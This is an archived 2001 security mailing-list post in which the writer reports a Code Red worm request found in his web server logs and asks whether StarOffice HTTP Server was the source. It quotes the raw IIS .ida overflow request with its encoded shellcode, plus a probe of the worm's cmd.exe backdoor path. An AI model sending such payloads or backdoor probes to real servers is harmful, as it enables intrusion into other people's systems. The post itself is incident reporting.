While going through my logs I happened to notice an AOL address and decided
I would check and see whether it was someone on AOL or an AOL server itself.
Luckily it was some poor soul using AOL rather than the company actually
having a Code Red problem. That aside I noticed one very curious aspect of
the webserver while I was just playing around throwing commands at it. Up
till now I have seen problems with Cisco, and IIS. I thought I should report
this as I have not read anywhere that StarOffice HTTP Server was vulnerable.
log of attack:
---------------
172.177.28.x - - [06/Aug/2001:06:55:57 -0500] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 210 "-" "-"
Nothing unusual there....
Check out the 404 while i was testing for the Trojan aspect of the newer
variant:
----------
HTTP Error 404
404 Not found ("/c/winnt/system32/cmd.exe?/c+dir")
----------------------------------------------------------------------------
----
Generated by StarOffice HTTP Server 1.0
Anyone else seen any other attacks generating from StarOffice or is this
just a freak incident? I haven't reported this to Sun as I'm not 100% it's
the StarOffice that attacked me earlier, they could have switched HTTPd's
since then. If anyone has StarOffice installed and would check it would
clear this up.
Thanks,
Tim
This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 16:26:49 PDT